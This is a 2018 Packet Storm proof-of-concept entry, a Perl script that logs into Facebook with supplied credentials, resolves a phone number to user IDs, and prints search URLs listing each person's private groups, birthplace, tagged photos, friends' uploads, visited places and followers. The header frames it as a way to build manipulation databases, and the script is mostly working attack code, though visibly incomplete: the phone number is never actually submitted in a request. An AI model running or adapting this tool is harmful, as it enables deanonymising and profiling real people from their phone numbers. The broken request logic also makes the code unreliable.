Facebook Graph OpenSearch Phone Number Metadata Crosswalk Mapping

Type packetstorm
Reporter Todor Donev
Modified 2018-05-29T00:00:00


# Facebook 'Graph' OpenSearch Phone Number metadata   
# crosswalk mapping (PoC)  
# 2018 Todor Donev <todor.donev at gmail.com>  
# https://ethical-hacker.org/  
# https://facebook.com/ethicalhackerorg  
# Description:  
# Criminal hacker (CRACKER) can take advantage of   
# this weakness by creating a specialized database   
# to manipulate facebook users with fake news,   
# propaganda or to influence elections with  
# distributed trolling.   
# See Also:   
# https://en.wikipedia.org/wiki/Schema_crosswalk  
# Disclaimer:  
# This or previous programs is for Educational  
# purpose ONLY. Do not use it without permission.  
# The usual disclaimer applies, especially the  
# fact that Todor Donev is not liable for any  
# damages caused by direct or indirect use of the  
# information or functionality provided by these  
# programs. The author or any Internet provider  
# bears NO responsibility for content or misuse  
# of these programs or any derivatives thereof.  
# By using these programs you accept the fact  
# that any damage (dataloss, system crash,  
# system compromise, etc.) caused by the use  
# of these programs is not Todor Donev's  
# responsibility.  
# Use them at your own risk!  
# Requirements:  
# cpan install HTTP::Cookies  
# cpan install WWW::Mechanize  
# cpan install List::MoreUtils  
# cpan install Number::Phone  
# I know that is buggy but is only conceptual tool   
# which demonstrate exploitation of this weakness.  
# Facebook answer:  
# Hi Todor,  
# Thank you for contacting us. Unfortunately what   
# you have described is not currently covered by   
# this program. Please see   
# https://www.facebook.com/data-abuse/terms/ for   
# more information about what is currently in scope   
# of this program. We will follow up with you   
# regarding any questions we may have. For any other   
# questions or concerns, please visit our Help Center:  
# https://www.facebook.com/help.  
# Thanks,  
# Amber Serrano  
# Developer Operations  
# Data Abuse Bounty is useless when this door is widely   
# opened for criminal abusing.  
use strict;  
use warnings;  
use WWW::Mechanize;  
use HTTP::Cookies;  
use List::MoreUtils qw(uniq);  
use Number::Phone;  
use open ':std', ':encoding(UTF-8)';  
my $un = ''; # facebook login  
my $pw = ''; # facebook password  
print "[ Facebook \'Graph\' OpenSearch Phone Number Crosswalk Metadata Mapping (PoC)\n";  
print "[ Website: https://ethical-hacker.org\n";  
print "[ Author: Todor Donev <todor.donev at gmail.com>\n";  
print "[ International Cybersecurity Association\n[\n";  
die "[ Usage: perl $0 <Phone Number>\n" unless (scalar @ARGV)==1;  
my $phnum = $ARGV[0];  
my $pn = Number::Phone->new($phnum);  
die "[ Error: This phone number is not valid\n" if(! eval { $pn->is_valid()});  
my $useragent = "USERAGENT HERE";  
my $mech = WWW::Mechanize->new(agent => $useragent);$mech->cookie_jar(HTTP::Cookies->new());  
$mech->submit_form(form_number => 1,fields =>{email=>$un,pass=>$pw});  
die "Error: $! \n" if !$mech->content() =~ /post_form_id\"\svalue=\"(\w+)\"/;  
die "[ Sorry, no results found\n[\n[ ==========================\n" if (($mech->content() =~ m{Content Not Found}) or ($mech->content() =~ m{No results found.}));  
if (my @userid = uniq($mech->content() =~ m/unit_id_result_id%22%3A(.*?)%2C%22/g)){  
while (@userid) {  
my $pid = shift @userid;  
printf "\x1b\x5b0;32m[\x1b\x5b0m User ID: \x1b\x5b0;35m https://www.facebook.com/$pid \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m Which facebook groups the person joined:\x1b\x5b0;33m https://www.facebook.com/search/$pid/groups \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m Which private facebook groups the person joined:\x1b\x5b0;33m https://www.facebook.com/search/$pid/groups-privacy \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m Where the person is bornd:\x1b\x5b0;33m https://www.facebook.com/search/$pid/users-birth-place \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m Posts that the person commented on:\x1b\x5b0;33m https://www.facebook.com/search/$pid/stories-commented \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m Posts that the person like:\x1b\x5b0;33m https://www.facebook.com/search/$pid/stories-liked \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m In which posts is this person tagged:\x1b\x5b0;33m https://www.facebook.com/search/$pid/stories-tagged \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m Posts by the person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/stories-by \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m Photos maded by the person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-by \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m Posts that the person like:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-in \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m Which photos does this person like:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-liked \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m Photos made of this person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-of \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m In which photos is this person tagged:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-tagged \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m What photos did the person comment on:\x1b\x5b0;33m https://www.facebook.com/search/$pid/photos-commented \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m What photos did the friends upload:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/photos-uploaded \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m What photos did the friends tagged:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/photos-tagged \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m What photos maded by the person's friends:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/photos-of \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m Photos by the person's friends:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/photos-by \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m Videos made of this person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-of \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m Videos maded by the person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-by \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m In which videos is this person:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-in \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m Which videos does this person like:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-liked \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m In which videos is this person tagged:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-tagged \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m What videos did the person comment on:\x1b\x5b0;33m https://www.facebook.com/search/$pid/videos-commented \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m What videos did the friends upload:\x1b\x5b0;33m https://www.facebook.com/search/$pid/friends/videos-uploaded \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m All visited places:\x1b\x5b0;33m https://www.facebook.com/search/$pid/places-visited \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m Which people are following:\x1b\x5b0;33m https://m.facebook.com/subscribe/lists/?id=$pid \x1b\x5b0m\n";  
printf "\x1b\x5b0;32m[\x1b\x5b0m \n";